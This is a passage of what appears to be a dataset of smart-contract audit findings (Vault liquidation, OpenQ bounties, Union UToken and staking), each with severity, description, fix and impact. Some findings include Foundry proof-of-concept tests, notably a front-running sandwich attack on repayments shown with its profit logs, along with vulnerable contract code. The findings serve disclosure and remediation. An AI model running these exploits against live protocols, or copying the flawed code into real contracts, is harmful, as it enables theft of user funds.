`alchemist.liquidate()` and `withdrawUnderlying()`. Because the contract no longer has fewer shares as a result of the yield distribution, the liquidation will fail.\\nPOC\\nRefer to the `testVaultLiquidationAfterRepayment()` test case below. Note that this requires a fix to be applied for #2 first.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.18;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../../lib/utils/VyperDeployer.sol\";\\n\\nimport \"../IVault.sol\";\\nimport \"../IAlchemistV2.sol\";\\nimport \"../MintableERC721.sol\";\\nimport \"openzeppelin/token/ERC20/IERC20.sol\";\\n\\ncontract VaultTest is Test {\\n ///@notice create a new instance of VyperDeployer\\n VyperDeployer vyperDeployer = new VyperDeployer();\\n\\n FairFundingToken nft;\\n IVault vault;\\n address vaultAdd;\\n IAlchemistV2 alchemist = IAlchemistV2(0x062Bf725dC4cDF947aa79Ca2aaCCD4F385b13b5c);\\n IWhitelist whitelist = IWhitelist(0xA3dfCcbad1333DC69997Da28C961FF8B2879e653);\\n address yieldToken = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c;\\n IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n // pranking from big WETH holder\\n address admin = 0x2fEb1512183545f48f6b9C5b4EbfCaF49CfCa6F3;\\n address user1 = address(0x123);\\n address user2 = address(0x456);\\n \\n function setUp() public {\\n vm.startPrank(admin);\\n nft = new FairFundingToken();\\n /// @notice: I modified vault to take in admin as a parameter\\n /// because of pranking issues => setting permissions\\n vault = IVault(\\n vyperDeployer.deployContract(\"Vault\", abi.encode(address(nft), admin))\\n );\\n // to avoid having to repeatedly cast to address\\n vaultAdd = address(vault);\\n vault.set_alchemist(address(alchemist));\\n\\n // whitelist vault and users in Alchemist system, otherwise will run into permission issues\\n vm.stopPrank();\\n vm.startPrank(0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9);\\n whitelist.add(vaultAdd);\\n whitelist.add(admin);\\n whitelist.add(user1);\\n whitelist.add(user2);\\n vm.stopPrank();\\n\\n vm.startPrank(admin);\\n\\n // add depositors\\n vault.add_depositor(admin);\\n vault.add_depositor(user1);\\n vault.add_depositor(user2);\\n\\n // check yield token is whitelisted\\n assert(alchemist.isSupportedYieldToken(yieldToken));\\n\\n // mint NFTs to various parties\\n nft.mint(admin, 1);\\n nft.mint(user1, 2);\\n nft.mint(user2, 3);\\n \\n\\n // give max WETH approval to vault & alchemist\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n\\n // send some WETH to user1 & user2\\n weth.transfer(user1, 10e18);\\n weth.transfer(user2, 10e18);\\n\\n // users give WETH approval to vault and alchemist\\n vm.stopPrank();\\n vm.startPrank(user1);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n vm.startPrank(user2);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n\\n // by default, msg.sender will be admin\\n vm.startPrank(admin);\\n }\\n\\n function testVaultLiquidationAfterRepayment() public {\\n uint256 depositAmt = 1e18;\\n // admin does a deposit\\n vault.register_deposit(1, depositAmt);\\n vm.stopPrank();\\n\\n // user1 does a deposit too\\n vm.prank(user1);\\n vault.register_deposit(2, depositAmt);\\n\\n // simulate yield: someone does partial manual repayment\\n vm.prank(user2);\\n alchemist.repay(address(weth), 0.1e18, vaultAdd);\\n\\n // mark it as claimable (burn a little bit more shares because of rounding)\\n vault.withdraw_underlying_to_claim(\\n alchemist.convertUnderlyingTokensToShares(yieldToken, 0.01e18) + 100,\\n 0.01e18\\n );\\n\\n vm.stopPrank();\\n\\n // user1 performs liquidation, it's fine\\n vm.prank(user1);\\n vault.liquidate(2, 0);\\n\\n // assert that admin has more shares than what the vault holds\\n (uint256 shares, ) = alchemist.positions(vaultAdd, yieldToken);\\n IVault.Position memory adminPosition = vault.positions(1);\\n assertGt(adminPosition.sharesOwned, shares);\\n\\n vm.prank(admin);\\n // now admin is unable to liquidate because of contract doesn't hold sufficient shares\\n // expect Arithmetic over/underflow error\\n vm.expectRevert(stdError.arithmeticError);\\n vault.liquidate(1, 0);\\n }\\n}\\n```\\nчFor the `shares_to_liquidate` and `amount_to_withdraw` variables, check against the vault's current shares and take the minimum of the 2.\\nThe better fix would be to switch from marking yield claims with withdrawing WETH collateral to minting debt (alETH) tokens.чFailing liquidations as the contract attempts to burn more shares than it holds.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.18;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../../lib/utils/VyperDeployer.sol\";\\n\\nimport \"../IVault.sol\";\\nimport \"../IAlchemistV2.sol\";\\nimport \"../MintableERC721.sol\";\\nimport \"openzeppelin/token/ERC20/IERC20.sol\";\\n\\ncontract VaultTest is Test {\\n ///@notice create a new instance of VyperDeployer\\n VyperDeployer vyperDeployer = new VyperDeployer();\\n\\n FairFundingToken nft;\\n IVault vault;\\n address vaultAdd;\\n IAlchemistV2 alchemist = IAlchemistV2(0x062Bf725dC4cDF947aa79Ca2aaCCD4F385b13b5c);\\n IWhitelist whitelist = IWhitelist(0xA3dfCcbad1333DC69997Da28C961FF8B2879e653);\\n address yieldToken = 0xa258C4606Ca8206D8aA700cE2143D7db854D168c;\\n IERC20 weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n // pranking from big WETH holder\\n address admin = 0x2fEb1512183545f48f6b9C5b4EbfCaF49CfCa6F3;\\n address user1 = address(0x123);\\n address user2 = address(0x456);\\n \\n function setUp() public {\\n vm.startPrank(admin);\\n nft = new FairFundingToken();\\n /// @notice: I modified vault to take in admin as a parameter\\n /// because of pranking issues => setting permissions\\n vault = IVault(\\n vyperDeployer.deployContract(\"Vault\", abi.encode(address(nft), admin))\\n );\\n // to avoid having to repeatedly cast to address\\n vaultAdd = address(vault);\\n vault.set_alchemist(address(alchemist));\\n\\n // whitelist vault and users in Alchemist system, otherwise will run into permission issues\\n vm.stopPrank();\\n vm.startPrank(0x9e2b6378ee8ad2A4A95Fe481d63CAba8FB0EBBF9);\\n whitelist.add(vaultAdd);\\n whitelist.add(admin);\\n whitelist.add(user1);\\n whitelist.add(user2);\\n vm.stopPrank();\\n\\n vm.startPrank(admin);\\n\\n // add depositors\\n vault.add_depositor(admin);\\n vault.add_depositor(user1);\\n vault.add_depositor(user2);\\n\\n // check yield token is whitelisted\\n assert(alchemist.isSupportedYieldToken(yieldToken));\\n\\n // mint NFTs to various parties\\n nft.mint(admin, 1);\\n nft.mint(user1, 2);\\n nft.mint(user2, 3);\\n \\n\\n // give max WETH approval to vault & alchemist\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n\\n // send some WETH to user1 & user2\\n weth.transfer(user1, 10e18);\\n weth.transfer(user2, 10e18);\\n\\n // users give WETH approval to vault and alchemist\\n vm.stopPrank();\\n vm.startPrank(user1);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n vm.startPrank(user2);\\n weth.approve(vaultAdd, type(uint256).max);\\n weth.approve(address(alchemist), type(uint256).max);\\n vm.stopPrank();\\n\\n // by default, msg.sender will be admin\\n vm.startPrank(admin);\\n }\\n\\n function testVaultLiquidationAfterRepayment() public {\\n uint256 depositAmt = 1e18;\\n // admin does a deposit\\n vault.register_deposit(1, depositAmt);\\n vm.stopPrank();\\n\\n // user1 does a deposit too\\n vm.prank(user1);\\n vault.register_deposit(2, depositAmt);\\n\\n // simulate yield: someone does partial manual repayment\\n vm.prank(user2);\\n alchemist.repay(address(weth), 0.1e18, vaultAdd);\\n\\n // mark it as claimable (burn a little bit more shares because of rounding)\\n vault.withdraw_underlying_to_claim(\\n alchemist.convertUnderlyingTokensToShares(yieldToken, 0.01e18) + 100,\\n 0.01e18\\n );\\n\\n vm.stopPrank();\\n\\n // user1 performs liquidation, it's fine\\n vm.prank(user1);\\n vault.liquidate(2, 0);\\n\\n // assert that admin has more shares than what the vault holds\\n (uint256 shares, ) = alchemist.positions(vaultAdd, yieldToken);\\n IVault.Position memory adminPosition = vault.positions(1);\\n assertGt(adminPosition.sharesOwned, shares);\\n\\n vm.prank(admin);\\n // now admin is unable to liquidate because of contract doesn't hold sufficient shares\\n // expect Arithmetic over/underflow error\\n vm.expectRevert(stdError.arithmeticError);\\n vault.liquidate(1, 0);\\n }\\n}\\n```\\n -when issuer set new winner by calling setTierWinner() code should reset invoice and supporting documents for that tierчmediumчif invoice or supporting documents are required to receive the winning prize then tier winner should provide them. bounty issuer or oracle would set invoice and supporting document status of a tier by calling `setInvoiceComplete()` and `setSupportingDocumentsComplete()`. bounty issuer can set tier winners by calling `setTierWinner()` but code won't reset the status of the invoice and supporting documents when tier winner changes. a malicious winner can bypass invoice and supporting document check by this issue.\\nif bounty issuer set invoice and supporting documents as required for the bounty winners in the tiered bounty, then tier winner should provide those and bounty issuer or off-chain oracle would set the status of the invoice and documents for that tier. but if issuer wants to change a tier winner and calls `setTierWinner()` code would changes the tier winner but won't reset the status of the invoice and supporting documents for the new winner. This is the `setTierWinner()` code in OpenQV1 and TieredBountyCore:\\n```\\n function setTierWinner(\\n string calldata _bountyId,\\n uint256 _tier,\\n string calldata _winner\\n ) external {\\n IBounty bounty = getBounty(_bountyId);\\n require(msg.sender == bounty.issuer(), Errors.CALLER_NOT_ISSUER);\\n bounty.setTierWinner(_winner, _tier);\\n\\n emit TierWinnerSelected(\\n address(bounty),\\n bounty.getTierWinners(),\\n new bytes(0),\\n VERSION_1\\n );\\n }\\n\\n function setTierWinner(string memory _winner, uint256 _tier)\\n external\\n onlyOpenQ\\n {\\n tierWinners[_tier] = _winner;\\n }\\n```\\n\\nAs you can see code only sets the `tierWinner[tier]` and won't reset `invoiceComplete[tier]` or `supportingDocumentsComplete[tier]` to false. This would cause an issue when issuer wants to change the tier winner. these are the steps that makes the issue:\\nUserA creates tiered Bounty1 and set invoice and supporting documents as required for winners to claim their funds.\\nUserA would set User1 as winner of tier 1 and User1 completed the invoice and oracle would set `invoiceComplete[1]` = true.\\nUserA would change tier winner to User2 because User1 didn't complete supporting documents phase. now User2 is winner of tier 1 and `invoiceComplete[1]` is true and User2 only required to complete supporting documents and User2 would receive the win prize without completing the invoice phase.чset status of the `invoiceComplete[tier]` or `supportingDocumentsComplete[tier]` to false in `setTierWinner()` function.чmalicious winner can bypass invoice and supporting document check when they are required if he is replace as another person to be winner of a tier.ч```\\n function setTierWinner(\\n string calldata _bountyId,\\n uint256 _tier,\\n string calldata _winner\\n ) external {\\n IBounty bounty = getBounty(_bountyId);\\n require(msg.sender == bounty.issuer(), Errors.CALLER_NOT_ISSUER);\\n bounty.setTierWinner(_winner, _tier);\\n\\n emit TierWinnerSelected(\\n address(bounty),\\n bounty.getTierWinners(),\\n new bytes(0),\\n VERSION_1\\n );\\n }\\n\\n function setTierWinner(string memory _winner, uint256 _tier)\\n external\\n onlyOpenQ\\n {\\n tierWinners[_tier] = _winner;\\n }\\n```\\n -Resizing the payout schedule with less items might revertчmediumчAccording to some comments in `setPayoutScheduleFixed`, reducing the number of items in the schedule is a supported use case. However in that case, the function will revert because we are iterating over as many items as there was in the previous version of the three arrays making the function revert since the new arrays have less items.\\nLet say they were 4 items in the arrays `tierWinners`, `invoiceComplete` and `supportingDocumentsComplete` and we are resizing the schedule to 3 items. Then the following function would revert because we use the length of the previous arrays instead of the new ones in the for loops.\\n```\\nfunction setPayoutScheduleFixed(\\n uint256[] calldata _payoutSchedule,\\n address _payoutTokenAddress\\n ) external onlyOpenQ {\\n require(\\n bountyType == OpenQDefinitions.TIERED_FIXED,\\n Errors.NOT_A_FIXED_TIERED_BOUNTY\\n );\\n payoutSchedule = _payoutSchedule;\\n payoutTokenAddress = _payoutTokenAddress;\\n\\n // Resize metadata arrays and copy current members to new array\\n // NOTE: If resizing to fewer tiers than previously, the final indexes will be removed\\n string[] memory newTierWinners = new string[](payoutSchedule.length);\\n bool[] memory newInvoiceComplete = new bool[](payoutSchedule.length);\\n bool[] memory newSupportingDocumentsCompleted = new bool[](\\n payoutSchedule.length\\n );\\n\\n for (uint256 i = 0; i < tierWinners.length; i++) { <=====================================================\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < invoiceComplete.length; i++) { <=====================================================\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < supportingDocumentsComplete.length; i++) { <=====================================================\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n }\\n```\\n\\nThe same issue exists on TieredPercentageBounty too.ч```\\n for (uint256 i = 0; i < newTierWinners.length; i++) {\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < newInvoiceComplete.length; i++) {\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < newSupportingDocumentsCompleted.length; i++) {\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n```\\n\\nNote this won't work if increasing the number of items compared to previous state must also be supported. In that case you must use the length of the smallest of the two arrays in each for loop.чUnable to resize the payout schedule to less items than the previous state.ч```\\nfunction setPayoutScheduleFixed(\\n uint256[] calldata _payoutSchedule,\\n address _payoutTokenAddress\\n ) external onlyOpenQ {\\n require(\\n bountyType == OpenQDefinitions.TIERED_FIXED,\\n Errors.NOT_A_FIXED_TIERED_BOUNTY\\n );\\n payoutSchedule = _payoutSchedule;\\n payoutTokenAddress = _payoutTokenAddress;\\n\\n // Resize metadata arrays and copy current members to new array\\n // NOTE: If resizing to fewer tiers than previously, the final indexes will be removed\\n string[] memory newTierWinners = new string[](payoutSchedule.length);\\n bool[] memory newInvoiceComplete = new bool[](payoutSchedule.length);\\n bool[] memory newSupportingDocumentsCompleted = new bool[](\\n payoutSchedule.length\\n );\\n\\n for (uint256 i = 0; i < tierWinners.length; i++) { <=====================================================\\n newTierWinners[i] = tierWinners[i];\\n }\\n tierWinners = newTierWinners;\\n\\n for (uint256 i = 0; i < invoiceComplete.length; i++) { <=====================================================\\n newInvoiceComplete[i] = invoiceComplete[i];\\n }\\n invoiceComplete = newInvoiceComplete;\\n\\n for (uint256 i = 0; i < supportingDocumentsComplete.length; i++) { <=====================================================\\n newSupportingDocumentsCompleted[i] = supportingDocumentsComplete[i];\\n }\\n supportingDocumentsComplete = newSupportingDocumentsCompleted;\\n }\\n```\\n -The `exchangeRateStored()` function allows front-running on repaymentsчmediumчThe `exchangeRateStored()` function allows to perform front-running attacks when a repayment is being executed.\\nSince `_repayBorrowFresh()` increases `totalRedeemable` value which affects in the final exchange rate calculation used in functions such as `mint()` and `redeem()`, an attacker could perform a front-run to any repayment by minting `UTokens` beforehand, and redeem these tokens after the front-run repayment. In this situation, the attacker would always be obtaining profits since `totalRedeemable` value is increased after every repayment.\\nProof of Concept\\n```\\n function increaseTotalSupply(uint256 _amount) private {\\n daiMock.mint(address(this), _amount);\\n daiMock.approve(address(uToken), _amount);\\n uToken.mint(_amount);\\n }\\n\\n function testMintRedeemSandwich() public {\\n increaseTotalSupply(50 ether);\\n\\n vm.prank(ALICE);\\n uToken.borrow(ALICE, 50 ether);\\n uint256 borrowed = uToken.borrowBalanceView(ALICE);\\n\\n vm.roll(block.number + 500);\\n\\n vm.startPrank(BOB);\\n daiMock.approve(address(uToken), 100 ether);\\n uToken.mint(100 ether);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] BOB balance:\", uToken.balanceOf(BOB));\\n console.log(\"[DAI] BOB balance:\", daiMock.balanceOf(BOB));\\n\\n uint256 currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[1] Exchange rate:\", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(ALICE);\\n uint256 interest = uToken.calculatingInterest(ALICE);\\n uint256 repayAmount = borrowed + interest;\\n\\n daiMock.approve(address(uToken), repayAmount);\\n uToken.repayBorrow(ALICE, repayAmount);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] ALICE balance:\", uToken.balanceOf(ALICE));\\n console.log(\"[DAI] ALICE balance:\", daiMock.balanceOf(ALICE));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[2] Exchange rate:\", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(BOB);\\n uToken.redeem(uToken.balanceOf(BOB), 0);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] BOB balance:\", uToken.balanceOf(BOB));\\n console.log(\"[DAI] BOB balance:\", daiMock.balanceOf(BOB));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[3] Exchange rate:\", currExchangeRate);\\n }\\n```\\n\\nResult\\n```\\n[PASS] testMintRedeemSandwich() (gas: 560119)\\nLogs:\\n\\n [UToken] Total supply: 150000000000000000000\\n [UToken] BOB balance: 100000000000000000000\\n [DAI] BOB balance: 0\\n [1] Exchange rate: 1000000000000000000\\n\\n [UToken] Total supply: 150000000000000000000\\n [UToken] ALICE balance: 0\\n [DAI] ALICE balance: 99474750000000000000\\n [2] Exchange rate: 1000084166666666666\\n\\n [UToken] Total supply: 50000000000000000000\\n [UToken] BOB balance: 0\\n [DAI] BOB balance: 100008416666666666600\\n [3] Exchange rate: 1000084166666666668\\n```\\nчIssue The `exchangeRateStored()` function allows front-running on repayments\\nAn approach could be implementing TWAP in order to make front-running unprofitable in this situation.чAn attacker could always get profits from front-running repayments by taking advantage of `exchangeRateStored()` calculation before a repayment is made.ч```\\n function increaseTotalSupply(uint256 _amount) private {\\n daiMock.mint(address(this), _amount);\\n daiMock.approve(address(uToken), _amount);\\n uToken.mint(_amount);\\n }\\n\\n function testMintRedeemSandwich() public {\\n increaseTotalSupply(50 ether);\\n\\n vm.prank(ALICE);\\n uToken.borrow(ALICE, 50 ether);\\n uint256 borrowed = uToken.borrowBalanceView(ALICE);\\n\\n vm.roll(block.number + 500);\\n\\n vm.startPrank(BOB);\\n daiMock.approve(address(uToken), 100 ether);\\n uToken.mint(100 ether);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] BOB balance:\", uToken.balanceOf(BOB));\\n console.log(\"[DAI] BOB balance:\", daiMock.balanceOf(BOB));\\n\\n uint256 currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[1] Exchange rate:\", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(ALICE);\\n uint256 interest = uToken.calculatingInterest(ALICE);\\n uint256 repayAmount = borrowed + interest;\\n\\n daiMock.approve(address(uToken), repayAmount);\\n uToken.repayBorrow(ALICE, repayAmount);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] ALICE balance:\", uToken.balanceOf(ALICE));\\n console.log(\"[DAI] ALICE balance:\", daiMock.balanceOf(ALICE));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[2] Exchange rate:\", currExchangeRate);\\n vm.stopPrank();\\n\\n vm.startPrank(BOB);\\n uToken.redeem(uToken.balanceOf(BOB), 0);\\n\\n console.log(\"\\n [UToken] Total supply:\", uToken.totalSupply());\\n console.log(\"[UToken] BOB balance:\", uToken.balanceOf(BOB));\\n console.log(\"[DAI] BOB balance:\", daiMock.balanceOf(BOB));\\n\\n currExchangeRate = uToken.exchangeRateStored();\\n console.log(\"[3] Exchange rate:\", currExchangeRate);\\n }\\n```\\n -Users can lose their staking rewards.чmediumчBy following the steps described in `Vulnerability Detail`, user is able to lose all of his staking rewards.\\nThe issue occurs in the following steps described below:\\nKiki calls the function `unstake` and unstakes all of his funds, as a result the internal function `_updateStakedCoinAge` is called to update his staked coin age till the current block.\\n```\\ncontracts/user/UserManager.sol\\n\\n function unstake(uint96 amount) external whenNotPaused nonReentrant {\\n Staker storage staker = stakers[msg.sender];\\n // Stakers can only unstaked stake balance that is unlocked. Stake balance\\n // becomes locked when it is used to underwrite a borrow.\\n if (staker.stakedAmount - staker.locked < amount) revert InsufficientBalance();\\n comptroller.withdrawRewards(msg.sender, stakingToken);\\n uint256 remaining = IAssetManager(assetManager).withdraw(stakingToken, msg.sender, amount);\\n if (uint96(remaining) > amount) {\\n revert AssetManagerWithdrawFailed();\\n }\\n uint96 actualAmount = amount - uint96(remaining);\\n _updateStakedCoinAge(msg.sender, staker);\\n staker.stakedAmount -= actualAmount;\\n totalStaked -= actualAmount;\\n emit LogUnstake(msg.sender, actualAmount);\\n }\\n```\\n\\n```\\ncontracts/user/UserManager.sol\\n\\n function _updateStakedCoinAge(address stakerAddress, Staker storage staker) private {\\n uint64 currentBlock = uint64(block.number);\\n uint256 lastWithdrawRewards = getLastWithdrawRewards[stakerAddress];\\n uint256 blocksPast = (uint256(currentBlock) - _max(lastWithdrawRewards, uint256(staker.lastUpdated)));\\n staker.stakedCoinAge += blocksPast * uint256(staker.stakedAmount);\\n staker.lastUpdated = currentBlock;\\n }\\n```\\n\\nAfter that Kiki calls the function `withdrawRewards` in order to withdraw his staking rewards. Everything executes fine, but the contract lacks union tokens and can't transfer the tokens to Kiki, so the else statement is triggered and the amount of tokens is added to his accrued balance, so he can still be able to withdraw them after.\\n```\\ncontracts/token/Comptroller.sol\\n\\n function withdrawRewards(address account, address token) external override whenNotPaused returns (uint256) {\\n IUserManager userManager = _getUserManager(token);\\n // Lookup account state from UserManager\\n (UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n // Lookup global state from UserManager\\n uint256 globalTotalStaked = userManager.globalTotalStaked();\\n uint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n // update the global states\\n gInflationIndex = _getInflationIndexNew(globalTotalStaked, block.number - gLastUpdatedBlock);\\n gLastUpdatedBlock = block.number;\\n users[account][token].updatedBlock = block.number;\\n users[account][token].inflationIndex = gInflationIndex;\\n if (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n return 0;\\n }\\n }\\n```\\n\\nThis is where the issue occurs, next time Kiki calls the function `withdrawRewards`, he is going to lose all of his rewards.\\nExplanation of how this happens:\\nFirst the internal function _getUserInfo will return the struct `UserManagerAccountState memory user`, which contains zero amount for effectiveStaked, because Kiki unstaked all of his funds and already called the function withdrawRewards once. This happens because Kiki has `stakedAmount = 0, stakedCoinAge = 0, lockedCoinAge = 0, frozenCoinAge = 0`.\\n```\\n(UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n```\\n\\nThe cache `uint256 amount` will have a zero value because of the if statement applied in the internal function `_calculateRewardsByBlocks`, the if statement will be triggered as Kiki's effectiveStaked == 0, and as a result the function will return zero.\\n```\\nuint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n```\\n\\n```\\nif (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n```\\n\\nSince the cache `uint256 amount` have a zero value, the if statement in the function `withdrawRewards` will actually be ignored because of `&& amount > 0`. And the else statement will be triggered, which will override Kiki's accrued balance with \"amount\", which is actually zero. As a result Kiki will lose his rewards.\\n```\\nif (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n\\n return 0;\\n }\\n```\\nчOne way of fixing this problem, that l can think of is to refactor the function _calculateRewardsByBlocks. First the function _calculateRewardsByBlocks will revert if `(totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0)`. Second new if statement is created, which is triggered if `user.effectiveStaked == 0`.\\nif `userInfo.accrued == 0`, it will return 0.\\nif `userInfo.accrued != 0`, it will return the accrued balance.\\n```\\nfunction _calculateRewardsByBlocks(\\n address account,\\n address token,\\n uint256 pastBlocks,\\n Info memory userInfo,\\n uint256 totalStaked,\\n UserManagerAccountState memory user\\n ) internal view returns (uint256) {\\n uint256 startInflationIndex = users[account][token].inflationIndex;\\n\\n if (totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n revert ZeroNotAllowed();\\n }\\n \\n if (user.effectiveStaked == 0) {\\n if (userInfo.accrued == 0) return 0;\\n else return userInfo.accrued\\n }\\n\\n uint256 rewardMultiplier = _getRewardsMultiplier(user);\\n\\n uint256 curInflationIndex = _getInflationIndexNew(totalStaked, pastBlocks);\\n\\n if (curInflationIndex < startInflationIndex) revert InflationIndexTooSmall();\\n\\n return\\n userInfo.accrued +\\n (curInflationIndex - startInflationIndex).wadMul(user.effectiveStaked).wadMul(rewardMultiplier);\\n }\\n```\\nчThe impact here is that users can lose their staking rewards.\\nTo understand the scenario which is described in `Vulnerability Detail`, you'll need to know how the codebase works. Here in the impact section, l will describe in little more details and trace the functions.\\nThe issue occurs in 3 steps like described in Vulnerability Detail:\\nUser unstakes all of his funds.\\nThen he calls the function `withdrawRewards` in order to withdraw his rewards, everything executes fine but the contract lacks union tokens, so instead of transferring the tokens to the user, they are added to his accrued balance so he can still withdraw them after.\\nThe next time the user calls the function `withdrawRewards` in order to withdraw his accrued balance of tokens, he will lose all of his rewards.\\nExplanation in details:\\nUser unstakes all of his funds by calling the function `unstake`.\\nHis stakedAmount will be reduced to zero in the struct `Staker`.\\nHis stakedCoinAge will be updated to the current block with the internal function `_updateStakedCoinAge`.\\nThen he calls the function withdrawRewards in order to withdraw his rewards, everything executes fine but the contract lacks union tokens, so instead of transferring the tokens to the user, they are added to his accrued balance so he can still withdraw them after.\\nUser's stakedCoinAge, lockedCoinAge and frozenCoinAge are reduced to zero in the function `onWithdrawRewards`.\\nThe next time the user calls the function `withdrawRewards` in order to withdraw his accrued balance of tokens, he will lose all of his rewards.\\nIn order to withdraw his accrued rewards stored in his struct balance `Info`. He calls the function `withdrawRewards` again and this is where the issue occurs, as the user has `stakedAmount = 0, stakedCoinAge = 0, lockedCoinAge = 0, frozenCoinAge = 0` .\\nDuo to that the outcome of the function _getCoinAge, which returns a memory struct of CoinAge to the function `_getEffectiveAmounts` will look like this:\\n```\\nCoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: lastWithdrawRewards,\\n diff: diff,\\n stakedCoinAge: staker.stakedCoinAge + diff * uint256(staker.stakedAmount),\\n lockedCoinAge: staker.lockedCoinAge,\\n frozenCoinAge: frozenCoinAge[stakerAddress]\\n });\\n\\n// The function will return:\\nCoinAge memory coinAge = CoinAge({\\n lastWithdrawRewards: random number,\\n diff: random number,\\n stakedCoinAge: 0 + random number * 0,\\n lockedCoinAge: 0, \\n frozenCoinAge: 0\\n });\\n```\\n\\nAs a result the function `_getEffectiveAmounts` will return zero values for effectiveStaked and effectiveLocked to the function `onWithdrawRewards`.\\n```\\nreturn (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.stakedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (coinAge.lockedCoinAge - coinAge.frozenCoinAge) / coinAge.diff,\\n memberTotalFrozen\\n );\\n\\nreturn (\\n // staker's total effective staked = (staked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (0 - 0) / random number,\\n // effective locked amount = (locked coinage - frozen coinage) / (# of blocks since last reward claiming)\\n coinAge.diff == 0 ? 0 : (0 - 0) / random number,\\n 0\\n );\\n```\\n\\nAfter that the function `withdrawRewards` caches the returning value from the internal function `_calculateRewardsByBlocks`. What happens is that in the function `_calculateRewardsByBlocks` the if statement is triggered because the user's effectiveStaked == 0. As a result the internal function will return 0 and the cache `uint256 amount` will equal zero.\\n```\\nuint256 amount = _calculateRewardsByBlocks(account, token, pastBlocks, userInfo, globalTotalStaked, user);\\n```\\n\\n```\\nif (user.effectiveStaked == 0 || totalStaked == 0 || startInflationIndex == 0 || pastBlocks == 0) {\\n return 0;\\n }\\n```\\n\\nSince the cache `uint256 amount` have a zero value, the if statement in the function `withdrawRewards` will actually be ignored because of `&& amount > 0`. And the else statement will be triggered, which will override Kiki's accrued balance with \"amount\", which is actually zero.\\n```\\nif (unionToken.balanceOf(address(this)) >= amount && amount > 0) {\\n unionToken.safeTransfer(account, amount);\\n users[account][token].accrued = 0;\\n emit LogWithdrawRewards(account, amount);\\n\\n return amount;\\n } else {\\n users[account][token].accrued = amount;\\n emit LogWithdrawRewards(account, 0);\\n\\n return 0;\\n }\\n```\\n\\nBelow you can see the functions which are invoked starting from the function _getUserInfo:\\n```\\n(UserManagerAccountState memory user, Info memory userInfo, uint256 pastBlocks) = _getUserInfo(\\n userManager,\\n account,\\n token,\\n 0\\n );\\n```\\n\\n```\\nfunction _getUserInfo(\\n IUserManager 